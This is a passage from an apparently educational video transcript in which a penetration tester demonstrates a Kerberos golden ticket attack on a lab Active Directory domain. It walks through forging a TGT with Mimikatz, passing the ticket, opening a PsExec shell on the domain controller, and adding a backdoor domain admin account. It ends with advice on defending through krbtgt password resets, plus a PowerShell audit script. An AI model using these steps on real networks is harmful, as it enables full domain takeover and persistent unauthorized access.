be a member of, for example. If we want the ticket to be a member of the 502 group, for example, we would say /groups 502. The SID here is used to identify the domain, while the group ID here is a relative ID which identifies the group. So I believe 502 is domain admin, and 519, I wonder if it's the Enterprise admins. So this is the reason why we need the SID as well, otherwise it's not going to be able to identify, okay, what domain is this. Below we have the service key; this is where it's being signed, typically by the KDC, but we are just doing this ourselves now by faking the ticket. And this is where it gets a little bit interesting. So we created this ticket now, on the 27th of April 2023. You see the 2023 here, David? Do you see anything interesting in the expiry date here?

Yeah, it's going to expire in the year 2033.

And I think, well, actually it's not completely 10 years, it's three days off; I think this might be due to leap years, which I think is every fourth year or something, they have 366 days instead of 365. But essentially, by default this ticket is valid for 10 years, and that's pretty sick, especially when you're going to see what I'm going to do with this ticket eventually; it's going to make it a little bit more crazy. Before we do that, however, I'm actually going to create an even more crazy ticket, because I did some funny experimentation earlier. In Mimikatz we can do /endin right in here; we need to specify the minutes, or we can specify the minutes we want the ticket to be valid. I was doing some research on 32-bit integers and that kind of stuff, how big of a value can you actually put here, and will the ticket actually be valid for that amount of time, and I found this two billion something-something value to be the maximum amount. Now let's call this ticket Corp Super golden, and let's see the expiry date. We're going to end up with two
tickets now they expired it well we created it today 24th of April right you're gonna live for a long time [Music] yeah so essentially if the CIS admin is not doing anything you know to combat this golden ticket we will essentially have access to this domain for 4 000 96 years or something like that so this is just obviously this is just kind of a fun thing right but it shows that it's possible and obviously if you have to do a golden ticket in the in a penetration test maybe you need to prove you know a concept or something set it to expire like 10 minutes 20 minutes or something like that you you really if your laptop gets stolen and someone gets hold of this Corp Super golden ticket now it's just so game over for this domain right and I'm gonna show why now I'm actually gonna exit out of mimikats I'm gonna exit CMD as well and start it over again just to prove uh what's going on here we're gonna go to see colon tools again we can start Powershell and do LS so this is just a basic user once again right yeah we are Michael now we have we have not injected any tickets right so if I do hear my groups here we are just Michael part of the RDP web so here are my groups we can see that we are just member of the user is nothing special going on here so LS we have the Corp golden but before injecting this ticket I just this is to prove that this works I'm gonna try to PSX now into the domain controller as Michael as our current user without the ticket injected and we can see that we immediately get an access is denied here so we are not able to to RDP well PSX act rather into the domain controller and we don't have any domain privileges right well not administrative ones anyway so ask Michael we're going to start mimikats again actually let's just do a LS Air Corp gold I want to copy this because this is the the ticket we're gonna use we could use both here but we're going to stop memicats and this just keep in mind that this can be done without any admin privileges and 
ejecting this ticket could actually be done on a computer that is not even a part of the domain and that's the that's that's really scary you could really take your laptop hook up to the network I mean you need to be able to communicate with the DC somehow but let's say you have some some misconfigured network you have a guest Network or something you tap into that to try to Ping the DC or communicate it communicate with it and you might be able to to get traffic right I've seen that as well so if you have access to the krb tdt then we can craft our ticket the only thing we actually need to do here is to do Kerberos PTT because this is a pass the ticket attack this is not mtlm hashes anymore and I'm just gonna feed it with a Corp golden ticket that is in my working tools directory right we hit enter we can see that the file Corp golden is okay it's now injected to our process in memicats now we can't just start CMD now because that that's not going to work because in that process we're not going to have the ticket injected right so I'm gonna do misc and just start cmd.txe from the current process instead where the ticket is injected that did not work we're just gonna do let me clear the screen there misc it's just CMD write this so we're going to start CMD from immigrats hit enter patch OK it says on the top there let's zoom in who are we we are Michael is there anything special going on here who are my groups nothing new here really let me zoom in and do this again so who are we Michael who are my groups nothing special right we are just a normal user the only only group you're a member of here in the domain is RDP web however with this ticket injected the memory let's try to do PS exec DC or one cmd.exe I can zoom in hopefully a little bit now right so we're doing this as Michael but we're gonna use our injected fake ticket and we're gonna present that to the KDC which is the key distribution center we're gonna try to get this service ticket and all that what I 
talked about earlier if we can trick the courtesy into believing that our tdt here is valid we should be able to be a PSX again into the controller or domain controller so let's see right this takes a little bit of time at least we're not getting uh we're not getting uh access denied right away right so we'll just wait for this service to start hopefully on the domain controller should be any moment now and we we will have a shell okay there we go who am I where Michael now who are my groups let me I need to zoom out a little bit here to to make this clear this is rather interesting let's see if we can we can get this uh who are my groups let's see so we just run who are my groups there on the domain controller with our golden ticket injected and we are now built-in administrators we have a lot of other things as well but we are also domain admin on Michael we are a group policy Creator owner we are schema adminster Enterprise admins and this denied rodc password replication group right High mandatory level we have access to everything as the user Michael so Michael is still not really a part of the domain mean admin script right if we check active directory now and go into the into the domain admins we're not going to see Michael there but we have been granted this access by the KDC because we fooled it with a valid TGT signed by the very Kerberos or krbt account in the domain so we're just fooling the entire system he could do anything he wanted now right yes so to demonstrate this let's have a look at we are at a domain controller hostname right so if I do net user on a domain controller we can see the users in active directory as well they are not local users but those are the users for the domain we can see Michael Jeff Kirby tdt Mary guest and so on and the command completed with one or more errors we don't really care about that so are we really domain admin we can try to find out right let's run the same we did with escalation we did earlier net user Mighty 
let's do a more complex password we can at least do a password one two three with a big p now right one three exclamation mark well one one two three like this and we do the slash add this is only going to add the user Mighty to the server running or serving active directory we don't really want that we want to add them to The Domain right net user Mighty password onto three add domain the command completed successfully so we now if we do net user we have might user here if I do net user Mighty I might try to to add the domain Flagger to see if it's better yeah so net user Mighty domain we can see that we are now a domain user but we are just a part of the domain users that's kind of boring right if I do net group domain admins Mighty add domain as our fake user here using our golden ticket okay that was not found I have a typo here let's do that again right so I'm going to go ahead and do net group domain admins we need to remember that Esther we're going to try to add Mighty because we are now a user in the domain add slash domain and this is never ever gonna work if if you're not a domain admin right the command completed successfully if I do net user Mighty slash domain here we are a part of the domain admins and that's that's pretty cool I have to say and we can now for example let's disconnect from the domain controller as well and just exit everything pick a log out from client to one and we can try to log in with a with a new user here my day password onto three in this case we log into the corp.com domain this is going a little bit quick now but but it's it's just so game or for this domain so I mean we can we can play around for ages here because it takes a little bit of time because it needs to to create the profile here in Windows but we have a welcome and hopefully we will see a desktop really soon as well so with this we also I mean obviously with domain admin we escalator our privileges on clients and and everything but you can go ahead now start CMD 
we don't even need to start with this admin because we we are essentially domain admin here net user Mighty slash domain part of the domain admits and all I can do everything I want with the domain or with MIT use right but I I didn't necessarily need to add my tier because I am Michael I have a ticket that is valid for 4 000 years right but this was just to to kind of show uh the power and that is it was not all just fake right it was an actual domain admin where we had that's fantastic really that's great I mean thanks so much for the demo you know it's it's it's one thing to read this it's one thing to like you know just talk about it but it's great to see the demos I really appreciate you putting the demo together because I know these demos can be really hard to do yeah this one was a lot of talking so um my voice is gonna be probably no but uniform great demo great demo so just to summarize we started with a user where we had credentials but it was just a very basic user and we ended with you having total control of the domain yeah so if you want to you know go further on our attack path there Jeff PS creds for example log in as domain admin take over DC and then golden ticket for example golden ticket eternal power [Music] that's basically right I mean of course there are ways to to invalidate a golden ticket as well but and this is actually something I wanted to mention so I have been on a lot of penetration tests and one of the things I really check is okay how long ago is it that the krb TGT password was changed right and I have seen this up to 12 15 years wow like the account is from when the domain was created and yes of course you might have upgraded from Windows 2000 to 2008 to 2012 2022 and so on but the Carib tdt password hash Remains the Same unless you actually you know reset the password right the only way to actually really invalidate a ticket like this is to reset the krb TGT password as twice you need to do it twice one is not enough and it's 
really difficult to just get away from this you're best offer if you just don't let an attacker get so far so it can get control over your domain controller right that's really the best thing to do follow best practices use strong password policies patch your software just don't that attacker scene in the first place so the easier said than done very easy to say that yeah definitely yeah and just for the systems out there I don't recommend it to just rush to your computer and reset this password now you want to do some research on how to actually do that first there are some best practices for it but for Kerberos there or the care be TTT password as they're they're Issa backwards compatibility right because if you reset the password on the krb krbt DT account and that hash immediately gets changed then existing tickets in your domains can be invalidated they're not going to work anymore people won't be able to do this and that Services might fail Etc but there is a backup for that so the previous ntlm hash that you used is still going to be stored and used as this kind of backup right but if you reset it twice then it's kind of okay your domain might not be functioning too well so you want to plan this out a little bit and I believe Microsoft has a script for this that you you should probably follow to invalid it and I strongly recommend having the krb TGT account involved in a password routine where you change it every so well often right now I mean it's I think the the point about all of this is you it's that whole thing why do we do this to show vulnerabilities and then to come up with best practices yep yep I mean you may not all pen testers necessarily know how to patch everything and that kind of stuff right but we we come with at least recommendations and this is for this domain uh this is the the best recommendation I can reset that password I would just reset it twice right away because in the meantime if you raise it once uh the attacker can still go 
ahead and refresh their golden ticket right and this is one of the reasons I mean in newspapers here in Scandinavia at least I often read about the tax and we often see that okay the attackers has been in our system for for so long right I mean we don't have control and that kind of stuff and there might be several reasons for that I mean they might have a very persistent vulnerability that they are exploiting over and over and over again like it's just an open door you can you can come and go as it like but if you at some point get access to this account as I mentioned you don't even need to be logged into the domain you just need to be able to communicate with the DC and you have the main admin or in fact you have the Privileges you want in the domain you can decide yourself right it's scary and again as a pen tester I don't recommend doing this but you know malicious people are doing it but I mean thanks so much again for showing the demo and for everyone who's watching put in the comments below did you enjoy this hopefully we can get Remy and others from an offsec team back to show more stuff like this because it's fantastic to see these demos I think but please put in the comments below Remy has just wanted to say thanks once again thanks for spending so much time building this and demonstrating it no problem I enjoyed it I like creating demos and share the knowledge out there so that's perfect
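The check the demo closes on, how long ago the krbtgt password was last set, as an added defender-side example that is not part of the video or of any tool shown in it. It assumes the ActiveDirectory RSAT module, a domain-authenticated session, and a rotation threshold of 180 days, which is an assumed policy value you would replace with your own. It also reads the account's msDS-KeyVersionNumber, which increments on every reset, so a double reset done the way the speaker recommends shows up as the number going up by two.

```powershell
# Added example (not from the video): audit the krbtgt account, whose key is
# what a golden ticket is signed with. Assumes RSAT ActiveDirectory module and
# a domain-authenticated session; the threshold below is an assumed policy value.
Import-Module ActiveDirectory

$maxAgeDays = 180   # assumed rotation policy; set to what your routine requires

$domain = Get-ADDomain
$krbtgt = Get-ADUser -Identity krbtgt -Properties PasswordLastSet, whenCreated, 'msDS-KeyVersionNumber'

$age = (Get-Date) - $krbtgt.PasswordLastSet

# Never reset since domain creation: PasswordLastSet sits right on whenCreated.
$neverRotated = ($krbtgt.PasswordLastSet - $krbtgt.whenCreated).TotalMinutes -lt 5

$status = if ($neverRotated) {
    'NEVER ROTATED since domain creation'
} elseif ($age.TotalDays -gt $maxAgeDays) {
    "ROTATE (older than $maxAgeDays days)"
} else {
    'OK'
}

[pscustomobject]@{
    Domain           = $domain.DNSRoot
    DomainCreated    = $krbtgt.whenCreated
    PasswordLastSet  = $krbtgt.PasswordLastSet
    AgeDays          = [int]$age.TotalDays
    KeyVersionNumber = $krbtgt.'msDS-KeyVersionNumber'
    Status           = $status
}

if ($status -ne 'OK') {
    Write-Warning 'krbtgt key is stale: any forged TGT signed with it (or with the previous key) stays valid until the password is reset twice.'
    Write-Warning 'Reset twice, waiting for AD replication to complete in between; Microsoft publishes New-KrbtgtKeys.ps1 for a staged reset.'
}
```

Run it on a domain controller or any RSAT host as a domain user; reading these attributes needs no admin rights. Record the KeyVersionNumber before and after a planned reset so the audit trail shows both increments rather than one.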
Info
Channel: David Bombal
Views: 231,651
Keywords: windows, windows hack, microsoft, microsoft windows, domain hack, oscp, pen-200, pen200, pen 200, offsec, offensive security, pentester, hacker, hack, hacking, pentesting, web hacking, free web hacking, owasp, owasp top 10, http, https, website, web hacking pro tips, ssl, ca, cookie, xss, cross site scripting, kali linux, portswigger, jscript, bug bounty, kali, ethical hacker, penetration testing, penetration tester
Id: f8jGhLwCa28
Length: 109min 44sec (6584 seconds)
Published: Fri Jun 02 2023